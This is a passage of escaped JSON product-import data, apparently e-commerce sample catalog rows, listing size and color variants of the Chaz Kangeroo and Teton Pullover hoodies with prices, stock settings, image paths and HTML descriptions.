"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},{\"sku\":\"MH01-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XL-Gray\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},{\"sku\":\"MH01-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie-XL-Orange\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"chaz-kangeroo-hoodie-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},{\"sku\":\"MH01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Chaz Kangeroo Hoodie\",\"description\":\"<p>Ideal for cold-weather training or work outdoors, the Chaz Hoodie promises superior warmth with every wear. Thick material blocks out the wind as ribbed cuffs and bottom band seal in body heat.<\\/p>\\n<p>&bull; Two-tone gray heather hoodie.<br \\/>&bull; Drawstring-adjustable hood. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Wool,pattern=Color-Blocked,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH01-XS-Black,size=XS,color=Black|sku=MH01-XS-Gray,size=XS,color=Gray|sku=MH01-XS-Orange,size=XS,color=Orange|sku=MH01-S-Black,size=S,color=Black|sku=MH01-S-Gray,size=S,color=Gray|sku=MH01-S-Orange,size=S,color=Orange|sku=MH01-M-Black,size=M,color=Black|sku=MH01-M-Gray,size=M,color=Gray|sku=MH01-M-Orange,size=M,color=Orange|sku=MH01-L-Black,size=L,color=Black|sku=MH01-L-Gray,size=L,color=Gray|sku=MH01-L-Orange,size=L,color=Orange|sku=MH01-XL-Black,size=XL,color=Black|sku=MH01-XL-Gray,size=XL,color=Gray|sku=MH01-XL-Orange,size=XL,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"image\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh01-gray_alt1.jpg,\\/m\\/h\\/mh01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Wool\",\"pattern\":\"Color-Blocked\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},{\"sku\":\"MH02-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XS-Black\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},{\"sku\":\"MH02-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XS-Purple\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},{\"sku\":\"MH02-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XS-Red\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},{\"sku\":\"MH02-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-S-Black\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},{\"sku\":\"MH02-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-S-Purple\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},{\"sku\":\"MH02-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-S-Red\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not 